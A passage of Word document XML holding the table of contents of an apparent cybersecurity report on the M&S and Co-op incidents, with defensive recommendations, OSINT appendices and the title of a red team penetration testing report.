            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76EC28E4" w14:textId="128FD82A"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0" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 Capability Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CE9AD42" w14:textId="31BE49DD"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11" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Detection and Response Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127111 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BA8B5B1" w14:textId="4E9649A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2" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 M&amp;S — Detection Failure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127112 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="624EEC50" w14:textId="404487F4"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3" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Co-op — Detection Success</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127113 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08CCAEEE" w14:textId="186A3FCE"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4" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Third-Party Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F5F8939" w14:textId="128C6170"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15" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Strategic Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127115 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F202259" w14:textId="6B142EC0"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6" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Deploy Phishing-Resistant MFA Across All Privileged Accounts [HIGH PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127116 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ED2BDF3" w14:textId="7616E0A5"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7" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 Enforce Identity-Verified Helpdesk Authentication Protocols [HIGH PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45CDD271" w14:textId="4BD5C7B7"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8" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3 Implement Network Micro-Segmentation and Zero Trust Architecture [HIGH PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127118 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="040F179D" w14:textId="4CE55150"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19" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4 Strengthen Domain Controller Monitoring and NTDS.dit Protection [HIGH PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127119 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52099E5A" w14:textId="3D71367F"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0" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5 Deploy User and Entity Behaviour Analytics (UEBA) with Tuned Baselines [MEDIUM PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127120 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="560CC500" w14:textId="4F167E2C"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1" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 Mandate Cyber Incident Rehearsals at Board and Technical Levels [MEDIUM PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127121 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42EE76D4" w14:textId="0941505F"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2" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.7 Enforce Immutable, Offline Backup Architecture [HIGH PRIORITY]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127122 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51517716" w14:textId="20D2F2D1"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23" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127123 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D525930" w14:textId="145B65FF"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24" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: OSINT Notes, Source Assessment, and Supplementary Diagrams</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127124 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B346A3F" w14:textId="5D3A86B6"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5" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.0  Chronological Timelines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127125 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44DCA444" w14:textId="52DAB82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6" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.1 Source Quality Assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127126 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F969314" w14:textId="153E3A7A"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7" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.2 OSINT Collection Notes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127127 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E953FF5" w14:textId="745071C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8" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.3 Attack Flow Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127128 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EC35DBE" w14:textId="651D81F8"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29" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.4 M&amp;S vs Co-op Comparative Outcome Table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127129 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17EFFD4B" w14:textId="555195B1"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0" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TASK 2 — Red Team Engagement: ABCD Ltd — Complete Penetration Testing Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127130 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CD4F3B8" w14:textId="35B75C58"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1" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127131 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4096D301" w14:textId="7E3C9600"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2" w:history="1">
